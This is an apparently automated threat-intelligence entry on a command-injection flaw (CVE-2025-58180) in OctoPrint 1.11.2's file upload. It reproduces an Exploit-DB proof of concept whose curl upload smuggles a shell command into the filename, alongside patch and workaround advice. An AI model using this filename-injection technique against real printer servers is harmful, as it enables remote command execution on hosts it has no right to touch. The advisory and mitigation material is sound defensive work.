OctoPrint 1.11.2 - File Upload
AI Analysis
Technical Summary
This entry covers an exploit against OctoPrint 1.11.2 targeting the file upload feature. The exploit code is published in Exploit-DB (ID 52476); the automated summary records no further technical details, affected sub-versions, vendor advisory or patch information. The exploit header included below, however, lists CVE-2025-58180, affected versions <= 1.11.2, a patched version of 1.11.3, and the GitHub Security Advisory GHSA-49mj-x8jp-qvfc, so remediation status should be confirmed against that advisory.
Potential Impact
The automated summary rates the impact as unclear because of limited technical detail and the absence of a vendor advisory. The exploit header itself is more specific: an authenticated user with file-upload access (API key or valid session, no admin rights) can submit a filename containing shell metacharacters, and if an administrator has configured a system event handler that interpolates the filename or path placeholder into a shell command, the shell interprets those characters and executes arbitrary commands on the host. Instances without such an event handler are not affected by this path. No known exploits in the wild have been reported.
Mitigation Recommendations
Patch status is not confirmed by the automated summary; check the vendor advisory for current remediation guidance. The exploit header names 1.11.3 as the patched version and lists the following workarounds: disable system event handlers that use filename or path placeholders (set enabled: false or uncheck them in the GUI Event Manager), set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads, and do not expose OctoPrint to hostile networks or grant upload access beyond trusted users. Until the upgrade is applied, administrators should also review who holds API keys or sessions with upload rights.
Indicators of Compromise
Exploit source code (Exploit-DB 52476):

# Exploit Title: OctoPrint 1.11.2 - File Upload
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.
Technical Details
- EDB ID: 52476
- Has exploit code: true
- Code language: text
Threat ID: 69845ddcf9fa50a62f0fd49c
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 4/7/2026, 11:04:41 AM
Last updated: 5/6/2026, 7:22:14 PM